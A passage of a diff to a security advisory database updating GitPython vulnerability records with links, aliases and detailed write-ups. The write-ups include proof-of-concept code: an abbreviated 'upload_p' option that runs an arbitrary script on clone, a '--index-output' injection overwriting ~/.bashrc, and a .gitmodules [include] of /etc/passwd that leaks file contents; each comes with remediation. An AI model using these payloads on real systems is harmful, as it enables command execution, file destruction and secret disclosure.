configuration.\n\n### The asymmetry (root cause)\n\n```python\n# git/cmd.py (commit 20c5e275), lines 948-974\n@classmethod\ndef _canonicalize_option_name(cls, option):\n option_name = option.lstrip(\"-\").split(\"=\", 1)[0]\n option_tokens = option_name.split(None, 1)\n if not option_tokens:\n return \"\"\n return dashify(option_tokens[0]) # only transform: \"_\" -> \"-\"\n\n@classmethod\ndef check_unsafe_options(cls, options, unsafe_options):\n canonical_unsafe_options = {cls._canonicalize_option_name(o): o for o in unsafe_options}\n for option in options:\n unsafe_option = canonical_unsafe_options.get(cls._canonicalize_option_name(option))\n if unsafe_option is not None:\n raise UnsafeOptionError(...)\n```\n\nThe guard normalizes only `_`→`-` and does exact dict membership. Git's CLI parser accepts a broader grammar (prefix abbreviation) than the guard models, so abbreviated keys slip through and reach git as the blocked option.\n\n### Affected code (commit `20c5e275`)\n\n| Location | Role |\n|---|---|\n| `git/cmd.py:948-960` `_canonicalize_option_name` | canonicalizer — no prefix expansion |\n| `git/cmd.py:963-974` `check_unsafe_options` | exact-match dict lookup (the incomplete guard) |\n| `git/cmd.py:1511` `transform_kwarg` | emits `--=` to the CLI |\n| `git/repo/base.py:1411,1413` | clone call sites |\n| `git/remote.py:1074,1128,1201` | fetch / pull / push call sites |\n\n### Bypass keys (verified)\n\n| kwarg key | git resolves to | path | weaponizable |\n|---|---|---|---|\n| `upload_p`, `upload_pac` | `--upload-pack` | clone / fetch / pull | Yes — direct RCE |\n| `receive_p` | `--receive-pack` | push | Yes — direct RCE |\n| `exe` | `--exec` | push | Yes — direct RCE |\n| `conf`, `confi` | `--config` | clone | bypasses option blocklist; RCE needs an additional config vector (see note) |\n\n### Minimal PoC\n\nSelf-contained, no network egress (a local bare repo acts as the \"remote\"). Tested on current `main` (git 2.50.1):\n\n```python\nimport os, stat, tempfile\nfrom git import Repo\n\nwork = tempfile.mkdtemp()\nmarker = os.path.join(work, \"RCE_MARKER\")\n\n# fake \"upload-pack\" program that proves arbitrary command execution\nprog = os.path.join(work, \"evil.sh\")\nwith open(prog, \"w\") as f:\n f.write(f\"#!/bin/sh\\ntouch {marker}\\nexit 1\\n\") # exit 1 so git aborts after our code ran\nos.chmod(prog, os.stat(prog).st_mode | stat.S_IEXEC)\n\nbare = os.path.join(work, \"remote.git\")\nRepo.init(bare, bare=True)\n\n# attacker-controlled kwarg KEY 'upload_p' -> --upload-p= -> git runs \ntry:\n Repo.clone_from(bare, os.path.join(work, \"out\"), upload_p=prog)\nexcept Exception:\n pass # git aborts with GitCommandError AFTER the payload executed\n\nprint(\"RCE marker created:\", os.path.exists(marker)) # True -> command injection confirmed\n```\n\nEquivalent at the shell: `git clone --upload-p=/tmp/evil.sh src out` runs `evil.sh`.\n\nConfirmed behavior:\n- `upload_pack` (exact) → blocked; `upload_p` (abbrev) → passes guard, reaches git, executes. The fix works for the form it models but not the abbreviated form.\n- `allow_unsafe_options=True` opt-out behaves as documented (out of scope).\n\n### Honest scope note\n\nLike the parent CVE, exploitation requires a host application that flows attacker-controlled kwarg **keys** into a GitPython clone/fetch/pull/push. Where the host passes only fixed/validated keys, this is not reachable — the vulnerability is in the library's documented defense-in-depth control (`allow_unsafe_options=False`), which this variant defeats.\n\nOn the `--config` family: `conf` bypasses the option blocklist, but weaponizing `--config protocol.ext.allow=always` via an `ext::` URL is independently blocked by GitPython's protocol allowlist (`allow_unsafe_protocols=False`). The directly weaponizable family is `upload-pack` / `receive-pack` / `exec`. Reported transparently — not claiming Critical.\n\n### Suggested remediation (any one)\n\n1. **Prefix-aware matching:** reject any option whose canonical name is an unambiguous prefix of a blocked option (≈ `startswith` on the blocked canonical name, after `dashify`).\n2. **Disable abbreviation at the sink:** pass `--end-of-options` or invoke git in a way that disables long-option abbreviation.\n3. **Allowlist** option names on security-sensitive subcommands instead of a blocklist.\n\nRemediation should also cover the `-c`/`--config` family abbreviations, even though the `ext::` route is currently gated by the protocol allowlist.", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2f96-g7mh-g2hx" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67325" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2161" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.51" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-injection-via-option-prefix-abbreviation" } ] } diff --git a/advisories/BREW-legit-CVE-2026-73619.json b/advisories/BREW-legit-CVE-2026-73619.json index 6df5a07689..ff86d11cea 100644 --- a/advisories/BREW-legit-CVE-2026-73619.json +++ b/advisories/BREW-legit-CVE-2026-73619.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-73619", "published": "2026-08-14T09:13:01Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-539m-9xh6-q6rr", - "CVE-2026-73619" + "CVE-2026-73619", + "PYSEC-2026-3948" ], "affected": [ { diff --git a/advisories/BREW-legit-CVE-2026-73620.json b/advisories/BREW-legit-CVE-2026-73620.json index b909fd2fa4..389359fb98 100644 --- a/advisories/BREW-legit-CVE-2026-73620.json +++ b/advisories/BREW-legit-CVE-2026-73620.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-73620", "published": "2026-08-14T09:13:01Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:40:06Z", "upstream": [ "GHSA-3f7w-8rr8-f37f", - "CVE-2026-73620" + "CVE-2026-73620", + "PYSEC-2026-3949" ], "affected": [ { diff --git a/advisories/BREW-legit-CVE-2026-73621.json b/advisories/BREW-legit-CVE-2026-73621.json index b413034d4c..4d260e52fc 100644 --- a/advisories/BREW-legit-CVE-2026-73621.json +++ b/advisories/BREW-legit-CVE-2026-73621.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-73621", "published": "2026-08-14T09:13:01Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-p538-c434-8v24", - "CVE-2026-73621" + "CVE-2026-73621", + "PYSEC-2026-3950" ], "affected": [ { diff --git a/advisories/BREW-legit-CVE-2026-73622.json b/advisories/BREW-legit-CVE-2026-73622.json index 7d84aa91c5..eb004c5753 100644 --- a/advisories/BREW-legit-CVE-2026-73622.json +++ b/advisories/BREW-legit-CVE-2026-73622.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-73622", "published": "2026-08-14T09:13:01Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-94p4-4cq8-9g67", - "CVE-2026-73622" + "CVE-2026-73622", + "PYSEC-2026-3951" ], "affected": [ { diff --git a/advisories/BREW-legit-CVE-2026-73623.json b/advisories/BREW-legit-CVE-2026-73623.json index 6e8ca041f3..32619ccb08 100644 --- a/advisories/BREW-legit-CVE-2026-73623.json +++ b/advisories/BREW-legit-CVE-2026-73623.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-73623", "published": "2026-08-14T09:13:01Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-6p8h-3wgx-97gf", - "CVE-2026-73623" + "CVE-2026-73623", + "PYSEC-2026-3952" ], "affected": [ { diff --git a/advisories/BREW-legit-CVE-2026-73625.json b/advisories/BREW-legit-CVE-2026-73625.json index c0739b7136..5ee8d2042d 100644 --- a/advisories/BREW-legit-CVE-2026-73625.json +++ b/advisories/BREW-legit-CVE-2026-73625.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-73625", "published": "2026-08-14T09:13:01Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-r9mr-m37c-5fr3", - "CVE-2026-73625" + "CVE-2026-73625", + "PYSEC-2026-3953" ], "affected": [ { diff --git a/advisories/BREW-legit-CVE-2026-76217.json b/advisories/BREW-legit-CVE-2026-76217.json index 5a0e02e064..bcfd19d85a 100644 --- a/advisories/BREW-legit-CVE-2026-76217.json +++ b/advisories/BREW-legit-CVE-2026-76217.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-76217", "published": "2026-08-20T09:05:37Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-hh9p-6wh2-4mfc", - "CVE-2026-76217" + "CVE-2026-76217", + "PYSEC-2026-3841" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-hh9p-6wh2-4mfc" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76217" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-pathspec-from-file" } ] } diff --git a/advisories/BREW-legit-CVE-2026-76218.json b/advisories/BREW-legit-CVE-2026-76218.json index f3435ccca9..503c522e39 100644 --- a/advisories/BREW-legit-CVE-2026-76218.json +++ b/advisories/BREW-legit-CVE-2026-76218.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-76218", "published": "2026-08-20T09:05:37Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-9rj7-rf2p-w77r", - "CVE-2026-76218" + "CVE-2026-76218", + "PYSEC-2026-3840" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-9rj7-rf2p-w77r" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76218" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-repo-init" } ] } diff --git a/advisories/BREW-legit-CVE-2026-76219.json b/advisories/BREW-legit-CVE-2026-76219.json index d207403075..8a2d1aec25 100644 --- a/advisories/BREW-legit-CVE-2026-76219.json +++ b/advisories/BREW-legit-CVE-2026-76219.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-76219", "published": "2026-08-20T09:05:37Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-4gmw-gg2m-w46p", - "CVE-2026-76219" + "CVE-2026-76219", + "PYSEC-2026-3838" ], "affected": [ { @@ -52,7 +53,7 @@ ] }, "summary": "GitPython: Unguarded git read-tree option forwarding in IndexFile.from_tree/reset/merge_tree enables arbitrary file overwrite", - "details": "## Summary\n`IndexFile.from_tree`, `IndexFile.reset` (→ from_tree) and `IndexFile.merge_tree` append caller-influenced treeish strings positionally to `git read-tree` with no unsafe-option guard, no `allow_unsafe_options` parameter, and no `--` separator. `git read-tree --index-output=` writes the resulting index to an arbitrary path, and last-occurrence-wins lets an injected `--index-output` override the method's internal temp path — clobbering an arbitrary file with a valid git-index blob. This is a distinct, never-guarded sink: commit `3af0c251` (GHSA-3f7w-8rr8-f37f) guarded only `checkout_index` and `tag`; `read_tree` was left unprotected (it is among the acknowledged unguarded call sites in that advisory's sweep but was never reported or fixed).\n\n## Root Cause\n`from_tree` (index/base.py:388), `reset` (delegates to from_tree), and `merge_tree` (index/base.py:291) call `repo.git.read_tree(*arg_list)` with no `check_unsafe_options` and no `--`. The treeish is caller-influenced and positional.\n\n## Impact\nArbitrary file overwrite / destruction at the privileges of the host process. Content is constrained to a git-index blob (not attacker-chosen, so not RCE), but the target path is fully attacker-controlled — corrupting/truncating configs or destroying files at attacker-chosen writable locations = I:H + A:H (per the skill's \"overwrite-any-path = I:H\" rule). Pure VALUE control (positional treeish). Default configuration.\n\n## Proof of Concept\n```python\nIndexFile.from_tree(repo, \"--index-output=/home/victim/.bashrc\")\n# target overwritten with a valid git-index blob (DIRC...)\n```\n\n## Attack Chain\n1. Entry: app calls `IndexFile.from_tree(repo, treeish)` / `reset(commit=…)` / `merge_tree(base=…, rhs=…)` with attacker `treeish=\"--index-output=/home/victim/.bashrc\"`.\n2. Check: NONE — the methods have no `allow_unsafe_options` and never call `check_unsafe_options`.\n3. Sink: `repo.git.read_tree(*arg_list)` — no `--`. argv (from_tree, observed): `['git','read-tree','--index-output=','--index-output=/…/victim']` (last-wins).\n4. Impact: target path created/overwritten with a valid git-index blob; existing content destroyed.\n\n## Bypass Evidence\nIndependently reproduced (gate harness): `IndexFile.from_tree(repo,'--index-output=')` → victim overwritten; before=`IMPORTANT ORIGINAL CONTENT`, after starts `DIRC\\x00\\x00\\x00\\x02…` (destructive clobber, valid index blob). `reset(commit=…)` and both `merge_tree` positionals verified. Fix-commit read: `3af0c251` touched only `checkout_index`+`tag`; `read_tree` untouched on HEAD.\n\n## Affected Versions\n`GitPython <= 3.1.57` (sinks present verbatim on the latest release tag).\n\n## Suggested Fix\nAdd a `check_unsafe_options` guard (with an `allow_unsafe_options` parameter) to `from_tree`/`reset`/`merge_tree`, and/or place a `--` separator before the positional treeish arguments; block `--index-output` (a path-taking option) on this sink.\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", + "details": "## Summary\n`IndexFile.from_tree`, `IndexFile.reset` (→ from_tree) and `IndexFile.merge_tree` append caller-influenced treeish strings positionally to `git read-tree` with no unsafe-option guard, no `allow_unsafe_options` parameter, and no `--` separator. `git read-tree --index-output=` writes the resulting index to an arbitrary path, and last-occurrence-wins lets an injected `--index-output` override the method's internal temp path — clobbering an arbitrary file with a valid git-index blob. This is a distinct, never-guarded sink: commit `3af0c251` (GHSA-3f7w-8rr8-f37f) guarded only `checkout_index` and `tag`; `read_tree` was left unprotected (it is among the acknowledged unguarded call sites in that advisory's sweep but was never reported or fixed).\n\n## Root Cause\n`from_tree` (index/base.py:388), `reset` (delegates to from_tree), and `merge_tree` (index/base.py:291) call `repo.git.read_tree(*arg_list)` with no `check_unsafe_options` and no `--`. The treeish is caller-influenced and positional.\n\n## Impact\nArbitrary file overwrite / destruction at the privileges of the host process. Content is constrained to a git-index blob (not attacker-chosen, so not RCE), but the target path is fully attacker-controlled — corrupting/truncating configs or destroying files at attacker-chosen writable locations = I:H + A:H (per the skill's \"overwrite-any-path = I:H\" rule). Pure VALUE control (positional treeish). Default configuration.\n\n## Proof of Concept\n```python\nIndexFile.from_tree(repo, \"--index-output=/home/victim/.bashrc\")\n# target overwritten with a valid git-index blob (DIRC...)\n```\n\n## Attack Chain\n1. Entry: app calls `IndexFile.from_tree(repo, treeish)` / `reset(commit=…)` / `merge_tree(base=…, rhs=…)` with attacker `treeish=\"--index-output=/home/victim/.bashrc\"`.\n2. Check: NONE — the methods have no `allow_unsafe_options` and never call `check_unsafe_options`.\n3. Sink: `repo.git.read_tree(*arg_list)` — no `--`. argv (from_tree, observed): `['git','read-tree','--index-output=','--index-output=/…/victim']` (last-wins).\n4. Impact: target path created/overwritten with a valid git-index blob; existing content destroyed.\n\n## Bypass Evidence\nIndependently reproduced (gate harness): `IndexFile.from_tree(repo,'--index-output=')` → victim overwritten; before=`IMPORTANT ORIGINAL CONTENT`, after starts `DIRC\\x00\\x00\\x00\\x02…` (destructive clobber, valid index blob). `reset(commit=…)` and both `merge_tree` positionals verified. Fix-commit read: `3af0c251` touched only `checkout_index`+`tag`; `read_tree` untouched on HEAD.\n\n## Affected Versions\n`GitPython <= 3.1.57` (sinks present verbatim on the latest release tag).\n\n## Suggested Fix\nAdd a `check_unsafe_options` guard (with an `allow_unsafe_options` parameter) to `from_tree`/`reset`/`merge_tree`, and/or place a `--` separator before the positional treeish arguments; block `--index-output` (a path-taking option) on this sink.", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-4gmw-gg2m-w46p" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76219" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-overwrite-via-read-tree" } ] } diff --git a/advisories/BREW-legit-CVE-2026-76220.json b/advisories/BREW-legit-CVE-2026-76220.json index a7543222c5..73561d02a3 100644 --- a/advisories/BREW-legit-CVE-2026-76220.json +++ b/advisories/BREW-legit-CVE-2026-76220.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-76220", "published": "2026-08-20T09:05:37Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-wvpp-8hx9-p66j", - "CVE-2026-76220" + "CVE-2026-76220", + "PYSEC-2026-3843" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-wvpp-8hx9-p66j" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76220" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-execution-via-split-single-char-options" } ] } diff --git a/advisories/BREW-legit-CVE-2026-76221.json b/advisories/BREW-legit-CVE-2026-76221.json index 2b8b58bdac..d6b27a9326 100644 --- a/advisories/BREW-legit-CVE-2026-76221.json +++ b/advisories/BREW-legit-CVE-2026-76221.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-76221", "published": "2026-08-20T09:05:37Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-jm78-9fvv-mhgr", "CVE-2026-76221", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2026-76222.json b/advisories/BREW-legit-CVE-2026-76222.json index 150816c9f1..944fd237ae 100644 --- a/advisories/BREW-legit-CVE-2026-76222.json +++ b/advisories/BREW-legit-CVE-2026-76222.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-76222", "published": "2026-08-20T09:05:37Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-hmq2-w58f-27jc", "CVE-2026-76222", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", @@ -73,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-hmq2-w58f-27jc" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76222" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2202" @@ -92,6 +88,14 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3784.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-gitmodules-submodule-name" } ] } diff --git a/advisories/BREW-legit-CVE-2026-78675.json b/advisories/BREW-legit-CVE-2026-78675.json index 690deba928..1a443af697 100644 --- a/advisories/BREW-legit-CVE-2026-78675.json +++ b/advisories/BREW-legit-CVE-2026-78675.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-78675", "published": "2026-09-04T09:19:02Z", - "modified": "2026-09-05T09:12:41Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "PYSEC-2026-3785", "CVE-2026-78675", @@ -52,21 +52,50 @@ } ] }, - "details": "GitPython before 3.1.59 fails to disable merge_includes when parsing .gitmodules, allowing attackers to disclose local file content by including arbitrary file paths via [include] directives. Attackers can craft a malicious .gitmodules file with include directives pointing to sensitive files; when repo.submodules is accessed, GitConfigParser raises MissingSectionHeaderError embedding the target file's first line verbatim in the exception message.", + "summary": "GitPython: Arbitrary local file content disclosure via [include] directive in untrusted .gitmodules (SubmoduleConfigParser never disables merge_includes)", + "details": "# [HIGH] Arbitrary local file content disclosure via `[include]` directive in untrusted `.gitmodules` (`SubmoduleConfigParser` never disables `merge_includes`)\n\n- **CWE:** CWE-200 (Exposure of Sensitive Information) / CWE-73 (External Control of File Name or Path)\n- **Affected component:** `git/objects/submodule/base.py`, `Submodule._config_parser()` (~line 273) constructing `SubmoduleConfigParser(fp_module, read_only=read_only)`; `git/config.py`, `GitConfigParser.__init__` (`merge_includes` default), `GitConfigParser.read()`/`_included_paths()` (include-path resolution, ~lines 630-685), `GitConfigParser._read()` (~line 493-498, `MissingSectionHeaderError`)\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\n`GitConfigParser.__init__` defaults `merge_includes=True`: any config file it parses has its `[include]` (and, when a `repo=` is supplied, `[includeIf ...]`) directives followed and merged in. The maintainers already recognized this as dangerous for one specific case and fixed it in commit `41ecc6a4` (\"Disable merge_includes in config writers\"), which passes `merge_includes=False` when `Repo.config_writer()` builds its parser (`git/repo/base.py`).\n\nThat fix never touched `Submodule._config_parser()`. This method builds the parser used for **every** read of a repo's submodule configuration — `repo.submodules`, `Submodule.iter_items()`, `Submodule.config()` — via `SubmoduleConfigParser(fp_module, read_only=read_only)`, passing neither `merge_includes=False` nor `repo=`. The `True` class default is therefore inherited unchanged, and `fp_module` here is `.gitmodules` — **the single most attacker-controlled config file in the entire codebase**, since it ships verbatim as tracked content inside any cloned repository.\n\n`GitConfigParser.read()`'s include-path resolution (~line 662-680) performs no containment check: `osp.isabs(include_path)` short-circuits the path join entirely for an absolute path, and a relative path is joined with `osp.join(osp.dirname(file_path), include_path)` / `osp.normpath()`'d with no check that the result stays under the repository. `~` is expanded via `osp.expanduser`. The only gate before opening is `os.access(include_path, os.R_OK)` — a readability check, not a path restriction.\n\nOnce opened, `GitConfigParser._read()` parses the target file as git-config INI. If the first non-blank/non-comment line is not a `[section]` header — true of virtually any non-gitconfig file (source code, `/etc/passwd`, `.env` files, credential files, logs, JSON/YAML) — it raises `configparser.MissingSectionHeaderError(fpname, lineno, line)`. Python's stdlib formats this exception's `str()` as `\"File contains no section headers.\\nfile: %r, line: %d\\n%r\" % (fpname, lineno, line)` — it embeds the **verbatim content** of that file's first line in the exception message. `Submodule.iter_items()` catches only `(IOError, BadName)`, not `configparser.Error`, so this exception propagates straight out of the ordinary, read-only `repo.submodules` call.\n\n## Root cause\nParity gap between two config-parser construction sites for the exact same footgun: `Repo.config_writer()` was hardened against `merge_includes` in 2023 (`41ecc6a4`); `Submodule._config_parser()` — which parses `.gitmodules`, content that is *always* attacker-controlled the moment a repository is cloned from an untrusted source — was never given the same treatment. (The submodule *write*-mode config parser at `git/objects/submodule/base.py` for `.git/modules//config` — a different, locally-generated file — has correctly passed `merge_includes=False` since 2022, underscoring that the omission for `.gitmodules` reads looks like an oversight rather than a considered exception.)\n\n## Exploit path\n1. Attacker crafts a repository whose `.gitmodules` contains a legitimate-looking `[submodule ...]` section plus:\n ```\n [include]\n \tpath = /etc/passwd\n ```\n (an absolute path bypasses any traversal reasoning entirely; a relative `../../../../etc/passwd`-style path works too).\n2. Victim performs the extremely common, entirely read-only operation of enumerating a cloned repo's submodules: `list(repo.submodules)` (or any `for sm in repo.submodules`) — no `update()`, `init()`, or checkout of any kind required.\n3. `SubmoduleConfigParser` (inheriting `merge_includes=True`) follows the `[include]` directive, opens `/etc/passwd`, and `GitConfigParser._read()` raises `MissingSectionHeaderError` whose message embeds `/etc/passwd`'s first line verbatim.\n4. This exception surfaces wherever the host application observes exceptions from GitPython — CI logs, error pages, exception trackers, or any dependency-scanner/code-review-bot/hosting-platform tool built on `repo.submodules` — disclosing the targeted file's first line to the attacker (directly, or indirectly via any channel that echoes the error).\n\n## Impact\nNon-blind local file content disclosure (first line) of any file readable by the victim process, triggered purely by attacker-controlled repository content and one routine, read-only GitPython call. Bounded to one line per triggering file (parsing aborts at the first `MissingSectionHeaderError`), but that line very often *is* the secret — `.env` files (`DATABASE_URL=...`, `API_KEY=...`), single-line credential/token files, `/etc/passwd`'s root entry for host fingerprinting. The primitive additionally serves as a generic error-based file-existence oracle for arbitrary host paths. This is materially stronger than the already-fixed, explicitly **blind** `GHSA-cwvm-v4w8-q58c` (\"Blind local file inclusion\", CVSS 4.0, `git/refs/symbolic.py` ref-name resolution) — that advisory's own writeup states it cannot disclose content; this one does, verbatim, via a different module (`git/config.py`'s include resolution).\n\n## Preconditions\n- Victim clones (or otherwise opens with GitPython) a repository whose `.gitmodules` is attacker-controlled — the default trust model for any tool that processes third-party repositories (dependency scanners, CI, code hosting/review bots, \"audit this repo\" utilities — exactly the class of application GitPython itself is built for).\n- Victim performs any operation that touches `repo.submodules` — one of the most ordinary GitPython operations, requiring no submodule `update`/`init`/checkout.\n- No authentication/role requirement inside GitPython itself.\n\n## Evidence\n- `git/config.py` — `GitConfigParser.__init__` defaults `merge_includes=True`.\n- `git/objects/submodule/base.py:273` — `SubmoduleConfigParser(fp_module, read_only=read_only)` passes neither `merge_includes` nor `repo=`; `git blame` shows this call unchanged since the class was introduced, and `git show 41ecc6a4` confirms that commit touched only `git/repo/base.py`'s `Repo.config_writer()`, never this call site.\n- `git/config.py` `_included_paths()`/`read()` (~630-685) — absolute include paths bypass the join/normpath entirely (`osp.isabs()` short-circuit); no repository-boundary containment check exists anywhere in this path.\n- `git/config.py` `_read()` (~493-498) — raises `cp.MissingSectionHeaderError(fpname, lineno, line)` with the raw file line embedded, matching Python stdlib `configparser`'s own `__str__` behavior.\n- `Submodule.iter_items()` catches only `(IOError, BadName)` — `configparser.Error` (the base of `MissingSectionHeaderError`) is not swallowed.\n- PoC (`gitpython-003-poc.py`, embedded below) reproduces this end-to-end against this exact checkout via the public API only (`Repo.clone_from` + `list(repo.submodules)`, default arguments, no monkeypatching), against both a throwaway secret file and `/etc/passwd`.\n\n## False-positive check (adversarial re-read)\n- **Is this the same bug as `GHSA-hmq2-w58f-27jc`?** No — that advisory is about the `.gitmodules` submodule *name* driving `_module_abspath`/`os.makedirs()` (creating a git repository/module directory outside the working tree, a write/RCE-adjacent primitive via a completely different function). This finding is about the `[include]` directive in the *same file* reaching a config-parser read primitive — a different mechanism, different function, different impact class (content disclosure, not directory creation).\n- **Is this the same bug as `GHSA-cwvm-v4w8-q58c` (blind LFI)?** No — that advisory is explicitly documented by its own reporter as content-free/blind (existence-only), and lives in `git/refs/symbolic.py`'s ref-name resolution feeding `Repo.commit`/`tree`/`index.diff` — an entirely different module and code path. This finding discloses actual file content via `git/config.py`'s include-directive resolution.\n- **Is the impact overstated given only one line leaks?** No — this is an accurate scoping caveat already reflected in the severity/impact discussion, not a reachability blocker: attacker has full control over which path is targeted (absolute paths work unconditionally), requires zero interaction beyond the single most common submodule operation, and the PoC demonstrates a real, working end-to-end disclosure through the standard `clone_from` + `list(repo.submodules)` workflow.\n- **Could the exception simply be silently swallowed by GitPython before reaching the caller?** No — confirmed by reading `Submodule.iter_items()`'s exception handling, which catches only `IOError`/`BadName`; `configparser.MissingSectionHeaderError` propagates uncaught.\n- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently against both a throwaway secret file and `/etc/passwd`.\n\n## Remediation\nPass `merge_includes=False` when constructing `SubmoduleConfigParser` in `Submodule._config_parser()` (`git/objects/submodule/base.py`), mirroring the existing fix in `Repo.config_writer()` (commit `41ecc6a4`) — `.gitmodules` content is always attacker-controlled and should never be allowed to pull in `include`/`includeIf` directives. As defense in depth, `GitConfigParser.read()`'s include-path resolution should enforce that resolved include paths stay within the repository's own directory tree, and parsing-error messages (`MissingSectionHeaderError`/`ParsingError`) should avoid embedding raw file content when parsing a file the caller did not explicitly ask to open.\n\n## Confidence\nHigh. Root cause confirmed by direct code reading across both `git/config.py` and `git/objects/submodule/base.py`, cross-checked against the fix commit that hardened the sibling code path but not this one; exploit chain reproduced independently, twice, against the current HEAD (a throwaway secret file and `/etc/passwd`).\n\n\n## Proof-of-Concept source (`gitpython-003-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-003 PoC: `.gitmodules` -- fully attacker-controlled 